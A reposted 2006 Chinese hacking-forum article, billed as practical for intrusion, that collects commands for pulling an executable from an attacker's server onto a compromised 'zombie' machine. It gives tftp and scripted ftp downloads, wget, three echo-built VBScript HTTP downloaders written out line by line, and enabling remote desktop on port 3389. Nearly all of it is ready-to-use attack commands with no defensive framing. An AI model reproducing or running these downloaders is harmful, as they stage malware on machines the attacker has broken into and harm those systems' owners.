上传方法总结[对入侵很实用]

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

作者:小虾米来自:朋友的家

现在将本人用于上传的方法进行汇总如下:

1. tftp法

先在自己某机器上建个tftp服务器,如执行tftpd32.exe,

再将文件(sample.exe)上传到别的机器中(肉鸡),

肉鸡cmd中执行: tftp -i 服务器ip get sample.exe

2. ftp法

肉鸡cmd中执行:

echo open ftp服务器ip [端口]>ftp.txt

echo username>>ftp.txt

echo password>>ftp.txt

echo get sample.exe>>ftp.txt

echo bye>>ftp.txt

ftp -s:ftp.txt

del ftp.txt

3. 工具法

利用wineggdrop的wget.exe

肉鸡cmd中执行:wget 网站/sample.exe

4. 利用dl.vbe法

肉鸡cmd中执行:

echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe

echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe

echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe

echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe

cscript dl.vbe http://*。*。*。*:88/sample.exe sample.exe

5. 利用iget.vbe法

方法同4,

肉鸡cmd中执行:

echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe

echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe

echo xPost.Open "GET",iRemote,0 >>iget.vbe

echo xPost.Send() >>iget.vbe

echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe

echo sGet.Mode = 3 >>iget.vbe

echo sGet.Type = 1 >>iget.vbe

echo sGet.Open() >>iget.vbe

echo sGet.Write(xPost.responseBody) >>iget.vbe

echo sGet.SaveToFile iLocal,2 >>iget.vbe

cscript iget.vbe http://*。*。*。*/sample.exe sample.exe

6. 利用Http网站vbe法

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe

echo xPost.Open "GET","http://*.*.*.*/sample.exe",0 >>dsa.vbe

echo xPost.Send() >>dsa.vbe

echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe

echo sGet.Mode = 3 >>dsa.vbe

echo sGet.Type = 1 >>dsa.vbe

echo sGet.Open() >>dsa.vbe

echo sGet.Write(xPost.responseBody) >>dsa.vbe

echo sGet.SaveToFile "sample.exe",2 >>dsa.vbe

cscript dsa.vbe

del dsa.vbe

7. 3389法

可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括硬件防火墙)

8. 其他未公开的方法

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航